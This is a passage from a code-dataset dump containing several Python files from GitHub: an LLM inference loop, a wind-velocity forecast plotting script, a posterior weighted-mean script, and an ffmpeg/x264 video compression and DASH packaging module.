prepare_dataset(df, 'test'), columns = ['text'])\ntest_dataset = Dataset.from_pandas(modified_df)\n\n# print(\"Train Sample: \", dataset['text'][0])\n# print(\"Train Data Sample: \", train_dataset['text'][0])\n# print(\"Dev Sample: \", dev_dataset['text'][0])\nprint(\"Test Sample: \", test_dataset['text'][0])\n\n\n### =============== Model Loading ===========================\ntokenizer = AutoTokenizer.from_pretrained(model_name, use_fast=True, trust_remote_code=True)\ntokenizer.pad_token = tokenizer.eos_token\n\nbnb_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_quant_type=\"nf4\",\n bnb_4bit_compute_dtype=torch.float16,\n device_map = \"auto\"\n)\n\nmodel = AutoModelForCausalLM.from_pretrained(\n model_name,\n quantization_config=bnb_config,\n trust_remote_code=True,\n)\nmodel.config.use_cache = False\nmodel.eval()\n\n### ==================== Inference ========================================\nfinal_outputs = []\n\nstart = 0\nend = len(test_dataset)\n\nfor i in tqdm(range(start, end)):\n instruction = test_dataset['text'][i]\n\n try:\n inputs = tokenizer(instruction, return_tensors=\"pt\").to(device)\n\n outputs = model.generate(**inputs, max_new_tokens=512)\n predicted_output = tokenizer.decode(outputs[0], skip_special_tokens=True)\n\n final_output = predicted_output.split('### Response:', 1)[1].strip().replace('```', '')\n\n # print(\"Predicted Output: \", predicted_output)\n # print(\"Final Output: \", final_output)\n final_outputs.append({'Index': str(i+1), 'Output': final_output})\n\n except Exception as e:\n print(e)\n final_outputs.append({'Index': str(i+1), 'Output': predicted_output})\n\ndf = pd.DataFrame(data = final_outputs, columns = ['Index', 'Output'])\nprint(df.shape)\nprint(df.head())\ndf.to_csv('output.csv', sep='\\t')","repo_name":"pavanbaswani/Eval4NLP_SharedTask","sub_path":"eval4nlp_mt.py","file_name":"eval4nlp_mt.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43530425305","text":"#!/usr/bin/python3\r\n\r\nimport sys\r\nfrom importlib import import_module\r\nimport numpy as np\r\nimport scipy.optimize as op\r\nimport tensorflow as tf\r\nimport JTNet\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nimport pickle\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nsys.path.insert(0,\".\")\r\nnp.seterr(divide=\"raise\", over=\"raise\", invalid=\"raise\")\r\n\r\n############## Job Control ##################################\r\n#\r\n# Defaults, changed by FWV_job.py\r\n#\r\njobctl_0 = {\r\n \"tf_chk_path\": None,\r\n \"tracker_jobctl\": None,\r\n \"data_path\": None,\r\n \"norm_filename\": None,\r\n \"val\": 5101,\r\n \"nsamp\": 40,\r\n \"contours\" : [0.683, 0.954],\r\n \"cont_plot_stem\": \"pcontour_\",\r\n \"speed_plot_stem\": \"wspeed_\",\r\n \"axis_labels\": [\"E-W Wind Vel. (m s$^{-1}$)\", \"N-S Wind Vel. (m s$^{-1}$)\"],\r\n \"simplex_scale\": 0.5,\r\n \"xdomain\" : (-7.0,4.0),\r\n \"ydomain\" : (-10.0, 1.0),\r\n \"ll_min\" : None,\r\n \"smax\": 15.0,\r\n \"s_samp\": 100,\r\n \"cplot_title\": \"3-Hour Delay Wind Velocity Forecast:\\n Colormap is Log Probability Density\",\r\n \"splot_title\": \"3-Hour Delay Wind Speed Forecast\",\r\n}\r\n\r\nfrom FWV_job import jobctl\r\njobctl_0.update(jobctl)\r\nglobals().update(jobctl_0)\r\n\r\njt = import_module(tracker_jobctl)\r\nglobals().update(jt.jobctl)\r\n\r\n################################################################\r\n\r\nwith open(norm_filename,'rb') as f:\r\n scaler = pickle.load(f)\r\n\r\n##########################\r\n# Some data management\r\n##########################\r\ndef readnpfile(data_file):\r\n data = np.load(data_file)\r\n if hasattr(data, \"files\"): # .npz file, assume first \"file\" is the data\r\n return data[data.files[0]]\r\n data.close()\r\n else:\r\n return data\r\n\r\ndatavectors = readnpfile(data_file)\r\nvecsize = datavectors.shape[1]\r\n\r\ns0max = datavectors[:,0].max() ; s0min = datavectors[:,0].min()\r\ns1max = datavectors[:,1].max() ; s1min = datavectors[:,1].min()\r\ns0 = s0max - s0min ; s1 = s1max - s1min\r\n\r\n##########################\r\n# Build the JTNN\r\n##########################\r\njtp = JTNet.jtprob(vecsize, layers, penalty=penalty_const)\r\ninit = tf.global_variables_initializer()\r\nsaver = tf.train.Saver()\r\n\r\n##########################\r\n# Log density function wrapper\r\n##########################\r\nsess = 0 # Will be set to tf.Session() later\r\nmul = 1.0 # During optimization change this to -1.0\r\nX = tf.placeholder(tf.float64, shape=(None, vecsize), name=\"X\")\r\nlpt = jtp.logprob(X)\r\ndef logprob(data_2d):\r\n # data_2d should have either shape (:,2) or (2)\r\n\r\n s2d = data_2d.shape\r\n if len(s2d) == 1:\r\n x = datavectors[val].reshape((1, vecsize)).copy()\r\n x[0,0:2] = data_2d[:]\r\n else:\r\n x = np.zeros((s2d[0],vecsize), dtype=np.float64)\r\n x[:,:] = datavectors[val].copy()\r\n x[:,0:2] = data_2d[:,:]\r\n \r\n x = scaler.transform(x)\r\n lp = sess.run(lpt, feed_dict={X: x})\r\n\r\n if len(s2d) == 1:\r\n lp = lp[0]\r\n \r\n return mul*lp\r\n\r\n####################\r\n# OK, let's go\r\n####################\r\nprint(datavectors[val])\r\nwith tf.Session() as sess:\r\n saver.restore(sess, tf_chk_path)\r\n\r\n ## Find optimum predicted wind vector\r\n mul = -1.0\r\n v0 = datavectors[val, :2] # Initial guess is true value, cheating, I know, but harmless\r\n init_splx = np.zeros((3,2))\r\n init_splx[0] = v0\r\n init_splx[1] = v0 + np.array([s0*simplex_scale, 0])\r\n init_splx[2] = v0 + np.array([0, s1*simplex_scale])\r\n res = op.minimize(logprob, v0, method=\"Nelder-Mead\", \r\n options={'initial_simplex':init_splx, 'disp': True})\r\n print(res)\r\n v_opt = res.x\r\n lp_opt = -res.fun # this is the mode of the distribution?\r\n\r\n mul = 1.0\r\n ## Calculate grid of normalized probability densities\r\n # d0ctr = 0.5*(s0max+s0min) ; d1ctr = 0.5*(s1max+s1min)\r\n # d0hwid = 0.5*(s0max-s0min)*domain_scale ; d1hwid = 0.5*(s1max-s1min)*domain_scale\r\n # d0lo = d0ctr - d0hwid ; d0hi = d0ctr + d0hwid\r\n # d1lo = d1ctr - d1hwid ; d1hi = d1ctr + d1hwid\r\n # v0pts = np.linspace(d0lo, d0hi, nsamp, dtype=np.float64)\r\n # v1pts = np.linspace(d1lo, d1hi, nsamp, dtype=np.float64)\r\n v0pts = np.linspace(xdomain[0], xdomain[1], nsamp, dtype=np.float64)\r\n v1pts = np.linspace(ydomain[0], ydomain[1], nsamp, dtype=np.float64)\r\n cellarea = (v0pts[1]-v0pts[0]) * (v1pts[1] - v1pts[0])\r\n V0, V1 =np.meshgrid(v0pts, v1pts, indexing=\"ij\")\r\n Vgrid = np.stack([V0,V1], axis=-1).reshape((-1,2))\r\n ldengrid = logprob(Vgrid).reshape((nsamp,nsamp))\r\n Pgrid = np.exp(ldengrid - lp_opt)\r\n Norm = Pgrid.sum() * cellarea\r\n Pgrid = Pgrid / Norm\r\n\r\nprint(datavectors[val])\r\n\r\n## Calculate densities at requested contours\r\ncontours = np.array(contours)\r\ncontours.sort()\r\nclevs = []\r\nSP = Pgrid.flatten()\r\nSP.sort()\r\nSP = np.flip(SP)\r\ncdf = 0.0\r\ni=0\r\nic = 0\r\nfor c in contours:\r\n while cdf < c:\r\n cdf += SP[i]*cellarea\r\n i += 1\r\n clevs.append(SP[i])\r\nclevs = np.flip(np.array(clevs))\r\n\r\n## Calculate wind speed density\r\ns_true = np.sqrt(datavectors[val,0]**2 + datavectors[val,1]**2)\r\ndels = smax / s_samp\r\nsarr = (np.arange(s_samp, dtype=np.float64) + 0.5) * dels\r\nwspeed_2d = np.sqrt(V0**2+V1**2)\r\nspden = np.zeros(s_samp)\r\nfor isamp in range(s_samp):\r\n vlo = sarr[isamp] - 0.5*dels\r\n vhi = sarr[isamp] + 0.5*dels\r\n spden[isamp] = Pgrid[np.logical_and(wspeed_2d > vlo, wspeed_2d <= vhi)].sum()\r\nnorm = spden.sum()*dels\r\nspden = spden / norm\r\n\r\n## Contour plot\r\nplotname = cont_plot_stem + \"%i.png\" % val\r\n\r\nfig = plt.figure()\r\nfig.set_figwidth(10.0)\r\nfig.set_figheight(10.0)\r\nax = fig.add_subplot(1,1,1)\r\nplt.axes().set_aspect('equal', 'box')\r\n\r\np = ax.pcolormesh(V0, V1, ldengrid, cmap=cm.RdYlGn, vmin=ll_min)\r\nfig.colorbar(p)\r\n\r\np = ax.contour(V0, V1, Pgrid, levels=clevs, colors=\"blue\")\r\np.levels = np.flip(contours*100)\r\nax.clabel(p, fontsize=14, fmt=\"%3.1f%%\")\r\ntrue = ax.plot(datavectors[val,0], datavectors[val, 1], \"r*\", markersize=15.0, label = \"3-Hr Delayed Observation\")\r\nmp = ax.plot(v_opt[0], v_opt[1], \"b+\", markersize=15.0, label=\"MAP Estimate\")\r\nax.legend()\r\nax.set_xlabel(axis_labels[0],fontsize=14) ; ax.set_ylabel(axis_labels[1], fontsize=14)\r\nax.set_title(cplot_title, fontsize=14)\r\n\r\nfig.savefig(plotname, format=\"png\")\r\nfig.clf()\r\n\r\n# Windspeed probability distribution\r\nplotname = speed_plot_stem + \"%i.png\" % val\r\n\r\nax = fig.add_subplot(1,1,1)\r\nax.plot(sarr, spden, \"b-\")\r\nax.set_xlabel(\"Wind Speed (m s$^{-1}$)\", fontsize=14)\r\nax.set_ylabel(\"Probability Density\", fontsize=14)\r\nax.set_title(splot_title, fontsize=14)\r\nax.axvline(s_true, color=\"green\", linewidth=3, label=\"3-Hr Delayed Observation\")\r\nax.legend(fontsize=14)\r\nfig.savefig(plotname, format=\"png\")\r\n\r\nplt.close()\r\n","repo_name":"rittlern/probabilistic_forecasting","sub_path":"forecasting_code/Forecasting/Verification/Forecast_WindVel.py","file_name":"Forecast_WindVel.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"27292842786","text":"from pylab import *\n\nf1 = open('posterior_points')\nX = []\nY = []\nW = []\ntemp = str()\n\nfor line in f1:\n if line[0] == '[':\n temp = line.strip()\n else:\n temp = temp +' '+ line.strip()\n \n if temp[-1] == ']':\n temp = temp[1:-1]\n temp = array(temp.split(),dtype=float)\n X.append(temp)\n temp = str()\nf1.close()\n\nf2 = open('posterior_weights')\n\nfor line in f2:\n W.append(float(line))\nf2.close()\n\nX = array(X)\nW = array(W)\n\nweighted_mean = mean(X.T*W,1)*(len(W)/sum(W))\n\nf3 = open('weighted_mean_142','w+')\nfor i in weighted_mean:\n f3.write(str(i)+'\\n')\nf3.close()","repo_name":"EdBoone/MarineEco","sub_path":"PythonCode/processing_post.py","file_name":"processing_post.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39401337262","text":"import os,subprocess\nimport random,json,re\nimport time\nfrom threading import Thread\n\n\n'''\n依赖:\ncompress:ffmpeg,x264\ndash:mp4fragment,mp4dash\n考虑:\nvcodec,acodec,vbr,abr,width,height\n1.h264,aac OK\nvbr,abr在合理范围内,直接resize,音频copy\n2.abr>标准\n直接压缩音频\n直接使用ffmpeg\n=====\n3.分离音视频,启用x264,压缩视频,压缩音频if\n合并\n'''\n\nclass Mp4(object):\n\tdef __init__(self,media , sizes=None , vbrUppers=None, abrUpper=131584, brLower=600000 , heightLower = 480,stdoutCb=None,stderrCb=None):\n\t\tself.media = media\n\t\tself.sizes = sizes\n\t\tself.vbrUppers = vbrUppers\n\t\tif vbrUppers :\n\t\t\tself.vbrUppersList = sorted(list(vbrUppers.items()) ,reverse=True )\n\t\tself.abrUpper = abrUpper\n\t\tself.brLower = brLower\n\t\tself.heightLower =heightLower\n\t\tself.stdoutCbRaw = stdoutCb\n\t\tself.stderrCbRaw = stderrCb\n\t\tself.result= {}\n\t\tself.lastLine = \"\"\n\t\tself.init()\n\tdef init(self):\n\t\tself.streams,self.format = getVideoInfo(self.media)\n\t\t# print(self.streams)\n\t\t# print(self.format)\n\t\t# print(self.streams['video'],self.format)\n\t\t\n\t\tself.dirpath , self.fileName = os.path.split(self.media)\n\t\tself.name,self.ext = os.path.splitext(self.fileName)\n\t\tself.fileWithoutExt =os.path.join(self.dirpath , self.name)\n\t\tself.ext = self.ext.lower()\n\n\t\tself.aac = self.fileWithoutExt+\".aac\"\n\t\tself.wav = \"\"\n\n\t\tself.height = int(self.streams['video']['height'])\n\t\tself.width = int(self.streams['video']['width'])\n\t\tself.br = int(self.format['bit_rate'])\n\t\tself.vbr = int(self.streams['video']['bit_rate'])\n\t\tself.abr = int(self.streams['audio']['bit_rate'])\n\t\tself.fileSize = int(self.format['size'])\n\t\tself.duration = float(self.format['duration'])\n\t\tself.vcodec = self.streams['video']['codec_name']\n\t\tself.acodec = self.streams['audio']['codec_name']\n\t\tv = self.streams['video']\n\t\tif 'nb_frames' in v:\n\t\t\tself.nb_frames = int(v['nb_frames'])\n\t\telse :\n\t\t\tif 'avg_frame_rate' in v:\n\t\t\t\tfri = v['avg_frame_rate'].find(\"/\")\n\t\t\t\tself.nb_frames = int(self.duration)*int(v['avg_frame_rate'][0:fri])\n\t\t\telse:\n\t\t\t\tself.nb_frames = int(self.duration)*25\n\t\tself.setHeight()\n\t\tself.setProgresses()\n\t\tself.progressIndex = 0\n\t\tself.progress = 0\n\t\tself.stdoutCb = self.stdoutCbWrap\n\t\tself.stderrCb = self.stderrCbWrap\n\n\n\tdef isH264(self):\n\t\treturn 'h264' == self.streams['video']['codec_name']\n\tdef isAac(self):\n\t\treturn 'aac' == self.streams['audio']['codec_name']\n\tdef videoNeedResize(self):\n\t\treturn int(self.streams['video']['width']) > self.heightLower\n\tdef audioNeedCompress(self):\n\t\treturn int(self.streams['audio']['bit_rate']) > self.abrUpper\n\t# def videoNeedCompress(self , i ):\n\t# \treturn int(self.streams['video']['bit_rate']) > self.sizesVideoBrLower[i]\n\n\tdef getAcc(self,nero=False):\n\t\tif self.isAac():\n\t\t\tcmd = \"ffmpeg -i {media} -vn -y \"\n\t\t\tif self.audioNeedCompress() :\n\t\t\t\tcmd += \" -acodec aac -vbr 3 -ab \"+str(self.abrUpper)+\" {aac}\"\n\t\t\telse :\n\t\t\t\tcmd += \" -acodec copy \"\n\t\t\tcmd += \" {aac}\"\n\t\t\trunCb(cmd.format(media=self.media,aac=self.aac) ,self.stdoutCb, self.stderrCb)\n\t\telse:\n\t\t\tif not nero :\n\t\t\t\tcmd = \"ffmpeg -i {media} -vn -y -acodec aac -vbr 3 {aac}\"\n\t\t\t\trunCb(cmd.format(media=self.media,aac=self.aac) ,self.stdoutCb, self.stderrCb)\n\t\t\telse :\n\t\t\t\tself.wav = self.fileWithoutExt+\".wav\"\n\t\t\t\tcmd1 = 'ffmpeg -i {media} -vn -c:a pcm_s16le -y -f wav {wav}'\n\t\t\t\tcmd2 = 'neroAacEnc -q 0.8 -ignorelength -2pass -if {wav} -of {aac}'\n\t\t\t\trunCb(cmd.format(media=self.media,aac=self.aac) ,self.stdoutCb, self.stderrCb)\n\t# def filterSizes(self):\n\t# \tresizes =[]\n\t# \tfor size in self.sizes :\n\t# \t\tif size[1] < self.height :\n\t# \t\t\tresizes.append(size)\n\t# \tif len(resizes) == 0:\n\t# \t\tresizes.append([self.width ,self.height])\n\t# \tif self.height > resizes[0][1] :\n\t# \t\tresizes.insert(0,[self.width ,self.height])\n\t# \treturn resizes\n\tdef vbrOk(self):\n\t\tif not self.vbrUppers or len(self.vbrUppers) <=0 :\n\t\t\treturn False\n\t\tups = list(self.vbrUppers.items())\n\t\tups.sort()\n\t\tups = list(reversed(ups))\n\t\tif self.height > ups[0][0] :\n\t\t\treturn self.vbr <= ups[0][1]\n\t\tfor i in ups :\n\t\t\tif self.height >= i[0]:\n\t\t\t\treturn self.vbr<= i[1] * (self.height/i[0]) * 1.2\n\t\treturn self.vbr <= ups[-1][1]\n\tdef preprocess(self):\n\t\tif self.ext.lower() == \".mov\":\n\t\t\ttoMp4(self.media , self.streams,self.stdoutCb,self.stderrCb)\n\t\t\tself.media = self.fileWithoutExt+\".mp4\"\n\t\t\tself.init()\n\tdef compress(self):\n\t\t# vbr is ok ,quick compress\n\t\tif self.vbrOk():\n\t\t\tqr = self.quickCompress()\n\t\t\tif qr is not None:\n\t\t\t\tself.progress = 100\n\t\t\t\treturn qr\n\t\t# other ,split media into video and audio\n\t\t# video -x264-> mkvs \n\t\t# audio -aac-> aac \n\t\t# merge into mp4s\n\n\t\t\n\t\tself.preprocess()\n\t\tvideoSuffix = \".mkv\"\n\t\tr = []\n\t\tself.getAcc()\n\t\ttmpVideos= []\n\t\tif self.sizes and len(self.sizes)>0 :\n\t\t\tcurVideo = self.media\n\t\t\tfor i, size in enumerate(self.sizes):\n\t\t\t\tself.progressIndex = i\n\t\t\t\tmp4Video = self.fileWithoutExt+\"_tmp_\"+formatSize(size)+videoSuffix\n\t\t\t\tx264Compress(curVideo,mp4Video,size,vbr=self.maxVbr(size[1]),stdoutCb=self.stdoutCb,stderrCb=self.stderrCb)\n\t\t\t\ttmpVideos.append(mp4Video)\n\t\t\t\tout = self.fileWithoutExt +\"_\"+str(i+1)+\".mp4\"\n\t\t\t\tmerge(mp4Video,self.aac,out)\n\t\t\t\tr.append(out)\n\t\t\t\tcurVideo = mp4Video\n\t\t\t\tself.result[size[1]] = out\n\t\telse :\n\t\t\tmp4Video = self.fileWithoutExt+\"_tmp\"+videoSuffix\n\t\t\tx264Compress(self.media,mp4Video,stdoutCb=self.stdoutCb,stderrCb=self.stderrCb)\n\t\t\ttmpVideos.append(mp4Video)\n\t\t\tout = self.fileWithoutExt +\"_1.mp4\"\n\t\t\tmerge(mp4Video,self.aac,out)\n\t\t\tr.append(out)\n\t\t\tself.result[self.height] = out\n\t\tif self.wav:\n\t\t\tos.remove(self.wav)\n\t\tif self.aac:\n\t\t\tos.remove(self.aac)\n\t\tfor v in tmpVideos:\n\t\t\tos.remove(v)\n\t\tself.progress = 100\n\t\treturn r\n\t\n\tdef maxVbr(self , height):\n\t\tif height >= self.vbrUppersList[0][0]:\n\t\t\treturn self.vbrUppersList[0][1]\n\t\tif height <= self.vbrUppersList[-1][0]:\n\t\t\treturn self.vbrUppersList[-1][1]\n\t\tfor i in self.vbrUppersList :\n\t\t\tif height >= i[0]:\n\t\t\t\treturn i[1]\n\t\treturn 0\n\tdef needCompress(self):\n\t\treturn self.height >= 1080 and self.br > 100*1024*8 \\\n\t\tor self.height < 1080 and self.height >= 720 and self.br > 60*1024*8 \\\n\t\tor self.height < 720 and self.height >= 480 and self.br > 40*1024*8 \\\n\t\tor self.height < self.br > 40*1024*8\n\n\tdef quickCompress(self):\n\t\t# if not self.videoNeedResize() and not self.audioNeedCompress():\n\t\t# return [toMp4(self.media,self.streams)]\n\t\t# if self.needCompress():\n\t\treturn self.mp4Resize()\n\t\t# return []\n\tdef setHeight(self ):\n\t\tif not self.sizes :\n\t\t\treturn\n\t\ths =[]\n\t\tstanardHeight = False\n\t\tfor size in self.sizes:\n\t\t\tif self.height == size[1]:\n\t\t\t\tstanardHeight = True\n\t\t\tif self.height >= size[1] :\n\t\t\t\ths.append(size)\n\t\tif not stanardHeight and len(hs)>0 and self.height> hs[0][1] :\n\t\t\ths.insert(0 ,[self.width,self.height])\n\t\tif not hs :\n\t\t\ths =[[self.width,self.height]]\n\t\tself.sizes = hs\n\n\tdef setProgresses(self):\n\t\tsizeLen = len(self.sizes)\n\t\tif sizeLen == 1:\n\t\t\tself.progresses = [100]\n\t\tif sizeLen ==2 :\n\t\t\tself.progresses = [60,40]\n\t\tif sizeLen ==3 :\n\t\t\tself.progresses = [50,30,20]\n\t\tif sizeLen ==4 :\n\t\t\tself.progresses = [45,25,20,10]\n\t\tif sizeLen ==5 :\n\t\t\tself.progresses = [45,25,15,10,5]\n\t\tif sizeLen >=6 :\n\t\t\tself.progresses = [40,20,10]\n\t\t\tfor i in range(sizeLen-3):\n\t\t\t\tself.progresses.append(30/(sizeLen-3))\n\n\tdef stdoutCbWrap(self,line):\n\t\tself.calcProgress(line)\n\t\tself.lastLine = line\n\t\tif self.stdoutCbRaw :\n\t\t\tself.stdoutCbRaw(line)\n\tdef stderrCbWrap(self,line):\n\t\tself.calcProgress(line)\n\t\tself.lastLine = line\n\t\tif self.stderrCbRaw :\n\t\t\tself.stderrCbRaw(line)\n\tdef calcProgress(self,line):\n\t\t# print(\"line:\",line)\n\t\tif not line or not hasattr(self,\"progresses\"):\n\t\t\treturn\n\t\trate = 0\n\t\tif \"frame=\" == line[0:6]:\n\t\t\t#frame= 123 fps=12\n\t\t\tend = line.find(\"fps=\")\n\t\t\tframeNo = int(line[7:end])\n\t\t\trate = frameNo / self.nb_frames\n\t\tif rate==0 and '['==line[0] :\n\t\t\t#[0.3%]\n\t\t\tm = re.match(r'^\\[(\\d*\\.\\d*)\\%\\].*', line[0:10])\n\t\t\tif m :\n\t\t\t\trate = float(m.group(1))/100\n\t\tif rate == 0 :\n\t\t\t# 123 frames\n\t\t\tm = re.match(\"^(\\d+)\\s+frames\" , line[0:20])\n\t\t\tif m :\n\t\t\t\trate = int(m.group(1))/self.nb_frames\n\t\tprogress = sum(self.progresses[0:self.progressIndex]) + self.progresses[self.progressIndex]*rate\n\t\tif progress >self.progress :\n\t\t\tself.progress = progress\n\n\tdef mp4Resize(self):\n\t\tcmd1 = 'ffmpeg -i {media} -y'\n\t\tif self.sizes:\n\t\t\tcmd1 += ' -s {size}'\n\t\tcmd2 = cmd1 +' {output}'\n\t\t# if not self.isAac():\n\t\t# \tcmd1 += \" -acodec aac\"\n\t\tif self.audioNeedCompress() :\n\t\t\tcmd1 += \" -acodec aac -vbr 3 -ab \"+str(self.abrUpper)\n\t\telse :\n\t\t\tcmd1 += \" -acodec copy \"\n\t\t# else :\n\t\t# \tcmd1 += \" -acodec copy\"\n\t\tif not self.isH264():\n\t\t\tcmd1 += \" -vcodec h264\"\n\t\telse :\n\t\t\tcmd1 += \" -vcodec copy\"\n\t\tcmd1 += ' {output}'\n\t\tcmd2 = cmd1\n\t\tr = []\n\t\tif self.sizes is not None:\n\t\t\t# print(\"sizes:\",self.sizes , self.height)\n\t\t\tcur = self.media\n\t\t\tfor i,size in enumerate(self.sizes):\n\t\t\t\tself.progressIndex = i\n\t\t\t\tif size[1] >= self.height and self.ext==\".mp4\":\n\t\t\t\t\tif size[1] == self.height:\n\t\t\t\t\t\tr.append(self.media)\n\t\t\t\t\t\tself.result[size[1]] = self.media\n\t\t\t\t\tcontinue\n\t\t\t\toutput = self.fileWithoutExt+\"_\"+str(i+1)+\".mp4\"\n\t\t\t\tif i ==0:\n\t\t\t\t\trunCb(cmd1.format(media=cur,size=formatSize(size) , output=output) ,self.stdoutCb, self.stderrCb)\n\t\t\t\telse :\n\t\t\t\t\trunCb(cmd2.format(media=cur,size=formatSize(size) , output=output) ,self.stdoutCb, self.stderrCb)\n\t\t\t\tcur = output\n\t\t\t\tr.append(output)\n\t\t\t\tself.result[size[1]] = output\n\t\telse :\n\t\t\toutput = self.fileWithoutExt+\"_1.mp4\"\n\t\t\trunCb(cmd1.format(media=self.media , output=output) ,self.stdoutCb, self.stderrCb)\n\t\t\tr.append(output)\n\t\t\tself.result[self.height] = output\n\t\treturn r\n\n\tdef dash(self , *mp4s):\n\t\tout = self.name+\".mpd\"\n\t\tdash(self.dirpath , out , *mp4s)\n\t\tself.result[\"mpd\"] = os.path.join(self.dirpath , out)\n\n\tdef compressDash(self):\n\t\tself.dash(*self.compress())\n\n\tdef isMp4(self):\n\t\treturn self.isH264() and self.isAac() and self.format['format_name'].lower().find(\"mp4\")!=-1\n\tdef toMp4(self):\n\t\tr = self.media\n\t\tif not self.isMp4():\n\t\t\tr = toMp4(self.media,self.streams,self.stdoutCb,self.stderrCb)\n\t\tself.result[\"mp4\"] = r\n\t\treturn r\n\tdef snapshot(self , n):\n\t\tv = self.result.get(720)\n\t\tif not v :\n\t\t\tv = self.result.get(self.sizes[-1][1])\n\t\tif not v :\n\t\t\treturn\n\t\t\t\n\t\tfor i in range(1,n+1) :\n\t\t\timg = os.path.join(self.dirpath , self.name+str(i)+\".jpg\")\n\t\t\tsnapshot(v , img , random.randint(0,int(self.duration)))\n\t\t\tself.result[\"capture\"+str(i)] =img\n\tdef captureMp4(self , n):\n\t\tv = self.result[\"mp4\"]\n\t\tif not v :\n\t\t\treturn\n\t\t\t\n\t\tfor i in range(1,n+1) :\n\t\t\timg = os.path.join(self.dirpath , self.name+str(i)+\".jpg\")\n\t\t\tsnapshot(v , img , random.randint(0,int(self.duration)))\n\t\t\tself.result[\"capture\"+str(i)] =img\n\n\tdef getResultRaw(self):\n\t\tfor k in self.result :\n\t\t\tif k == self.height:\n\t\t\t\treturn self.result[k]\n\t\treturn None\n\n\tdef isResultOk(self):\n\t\tfor k in self.result :\n\t\t\tif isinstance(k , int) and self.result[k]:\n\t\t\t\tif not os.path.exists(self.result[k]) :\n\t\t\t\t\treturn False\n\t\treturn True\n\n\ndef getVideoInfo(media):\n\tprob='ffprobe -v quiet -print_format json -show_format -show_streams {}'\n\tc = prob.format(media)\n\tstate, stdout,stderr = run(c)\n\tvideo_info = json.loads(stdout)\n\tstreams = {s['codec_type'] : s for s in video_info['streams']}\n\tformat = video_info['format']\n\n\treturn streams,format\n\ndef printVideoInfo(media):\n\tprob='ffprobe -v quiet -show_format -show_streams {}'\n\tc = prob.format(media)\n\tstate, stdout,stderr = run(c)\n\treturn stdout,state\n\n\ndef readStream(stream , cb=None) :\n\tline = ''\n\twhile True :\n\t\tb = stream.read(1)\n\t\tif not b :\n\t\t\tif cb :\n\t\t\t\tcb(line)\n\t\t\tbreak\n\t\tif '\\r' == b or '\\n' ==b :\n\t\t\t# output.append(line.strip())\n\t\t\tif cb :\n\t\t\t\tcb(line)\n\t\t\tline = ''\n\t\t\tcontinue\n\t\tline +=b\n\n\ndef runCb(cmd , stdoutCb=None , stderrCb=None, timeout=None,throwError=True,cwd=None,cmdStrCb=None) :\n\t'''execute cmd callback stdout,stderr line by line\n\t'''\n\tcmd = cmd\n\tif cmdStrCb:\n\t\tcmdStrCb(cmd)\n\tprint(\"run:\"+cmd)\n\tp = subprocess.Popen(cmd,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE , universal_newlines=True ,shell=True,cwd=cwd)\n\t# stdout = []\n\t# stderr = []\n\tstdoutThread = Thread(target=readStream,daemon=False,args=(p.stdout,stdoutCb))\n\tstderrThread = Thread(target=readStream,daemon=False,args=(p.stderr,stderrCb))\n\t\n\tstdoutThread.start()\n\tstderrThread.start()\n\tstate =0\n\t# try :\n\tstate = p.wait(timeout=timeout) \n\tif state!=0 and throwError:\n\t\traise(Exception('Execute cmd:\"'+cmd+'\" failed. state:'+str(state)))\n\t# except:\n\t# \treturn state\n\tstdoutThread.join()\n\tstderrThread.join()\n\treturn state\n\n\ndef run(cmd,throwError=True, cwd=None):\n\tstdout ,stderr = [],[]\n\tstate = runCb(cmd,lambda l:stdout.append(l) , lambda l:stderr.append(l) , throwError=throwError,cwd=cwd)\n\treturn state ,'\\n'.join(stdout) , '\\n'.join(stderr)\n\ndef appendFileName(filename , s):\n\ti = filename.rfind('.')\n\tif -1==i :\n\t\treturn filename+s\n\treturn filename[0:i]+s+filename[i:]\ndef formatSize(size):\n\tif len(size)<1:\n\t\treturn \"\"\n\tif len(size)<2:\n\t\treturn size[0]+\"\"\n\treturn str(size[0])+\"x\"+str(size[1])\n\ndef x264CopyResize(media , output ,size,stdoutCb=None,stderrCb=None):\n\tcmd = 'ffmpeg -i {media} -y -an -s {size} {output}'\n\tc = cmd.format(media=media , output=output , size=formatSize(size))\n\trunCb(c, stdoutCb,stderrCb)\ndef x264Compress(media,video,size=None,vbr = 0,stdoutCb=None,stderrCb=None):\n\tcmd = 'x264 --threads auto --crf 26 --preset 6 --subme 10 --ref 9 --bframes 14 --b-adapt 2 --qcomp 0.55 --psy-rd 0:0 --keyint 360 --min-keyint 1 --aq-strength 0.9 --aq-mode 3'\n\tif vbr >0 :\n\t\tcmd += \" -B \"+str(vbr//1024)\n\tcmd +=' -o {video} {media}'\n\t# cmd='x264 --threads auto --crf 26 --preset medium --me umh --tune film -o {video} {media}'\n\t# --vf resize:960,720,,,,lanczos\n\tcmd3Resize = ' --vf resize:{width},{height},,,,lanczos'\n\t# cmd3Resize = ' --vf resize:width={width},height={height},method=spline'\n\tc = cmd\n\tif size and len(size)==2:\n\t\tc += cmd3Resize\n\t\tc = c.format(media=media , video=video ,width=size[0] , height=size[1])\n\telse :\n\t\tc = c.format(media=media , video=video)\n\trunCb(c , stdoutCb, stderrCb)\n\ndef merge(video,audio,output):\n\tcmd = 'ffmpeg -i {video} -i {audio} -c copy -y {output}'\n\t# cmd='ffmpeg -i {video} -i {audio} -vcodec copy -acodec copy -y {output}'\n\trun(cmd.format(video=video,audio=audio,output=output))\n\ndef resize(src_file , dst_file , size , threads=8):\n\tcmd = 'ffmpeg -i {} -y -s {} -threads {} {}'\n\trun(cmd.format(src_file,size,threads,dst_file))\n\ndef dash(output_dir,mpd,*src_files):\n\t# cwd = os.path.dirname(src_files[0])\n\tname ,_=os.path.splitext(mpd)\n\t# {in} {out}\n\tcmd1 = 'mp4fragment --fragment-duration 10000 {} {}'\n\tfrags = []\n\tfragbases = []\n\tfor sf in src_files :\n\t\tfrag = appendFileName(sf , 